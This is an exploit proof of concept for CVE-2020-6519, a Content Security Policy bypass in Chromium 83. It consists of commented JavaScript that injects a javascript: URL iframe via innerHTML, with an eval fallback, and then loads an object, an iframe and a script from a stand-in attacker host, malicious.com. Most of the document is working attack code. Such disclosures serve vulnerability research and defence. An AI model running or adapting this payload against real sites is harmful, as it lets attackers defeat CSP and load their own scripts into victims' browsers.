
#Title: Chromium 83 - Full CSP Bypass
#Date: 02/09/2020
#Exploit Author: Gal Weizman
#Vendor Homepage: https://www.chromium.org/
#Software Link: https://download-chromium.appspot.com/
#Version: 83
#Tested On: Mac OS, Windows, iPhone, Android
#CVE: CVE-2020-6519
// Proof of concept for CVE-2020-6519 (Chromium 83 CSP bypass; see the header
// above and the write-up linked at the bottom of the file).
//
// Mechanism as written here: an <iframe> whose src is a `javascript:` URL is
// appended to the page body, and the code in that URL (`payload`) runs inside
// the new frame. The payload then loads an <object>, an <iframe> and a
// <script> from attacker-controlled URLs -- one probe per CSP directive named
// in each URL (object-src, child-src, script-src). If those three requests
// reach the attacker's host, the page's CSP did not govern them.
//
// Use only against a test page whose CSP you control. Replace the
// `malicious.com` placeholders with hosts whose request log you can read;
// observing the three requests is the evidence of the bypass, the
// `top.SUCCESS` flag alone only shows that the javascript: URL executed.
(function(){
    // The payload text is nested twice: inside this template literal (hence
    // its own backticks are written as \`) and, further down, inside a
    // single-quoted src attribute -- so it must not contain a single quote.
    // Its first statement sets a flag on the top window so the outer code
    // can tell whether the javascript: URL ran.
    // NOTE(review): this assumes `top` is writable from here (the PoC page is
    // top-level or same-origin with it); a cross-origin ancestor would make
    // the `top.SUCCESS` write throw. Confirm before embedding this elsewhere.
    var payload = `
top.SUCCESS = true;
var o = document.createElement("object");
o.data = \`http://malicious.com/bypass-object-src.html\`;
document.body.appendChild(o);
var i = document.createElement("iframe");
i.src = \`http://malicious.com/bypass-child-src.html\`;
document.body.appendChild(i);
var s = document.createElement("script");
s.src = \`http://malicious.com/bypass-script-src.js\`;
document.body.appendChild(s);
`;
    // Vector 1: insert the frame via innerHTML with a javascript: src.
    // `innerHTML +=` re-serializes and re-parses the whole body, discarding
    // existing event listeners and other DOM state -- acceptable for a PoC
    // page, not something to copy into anything else.
    // NOTE(review): whether insertion via innerHTML (rather than
    // createElement/appendChild) is required for the bypass or merely
    // incidental is not stated here -- check the linked write-up before
    // changing the insertion method.
    document.body.innerHTML+="<iframe id='XXX' src='javascript:" + payload +"'></iframe>";
    // Vector 2 (fallback): if the flag has not been set by the next task,
    // evaluate the payload directly in the frame's window. `XXX` resolves
    // through the window's named-element lookup of the id assigned above.
    // NOTE(review): setTimeout with no delay may fire before the javascript:
    // navigation has executed, so the fallback can also run in cases where
    // vector 1 would have succeeded on its own -- the probes may then fire
    // twice. Confirm the timing against the write-up if attributing the
    // bypass to one specific vector matters.
    setTimeout(() => {
        if (!top.SUCCESS) {
            XXX.contentWindow.eval(payload);
        }
    });
}())
// further information: https://github.com/weizman/CVE-2020-6519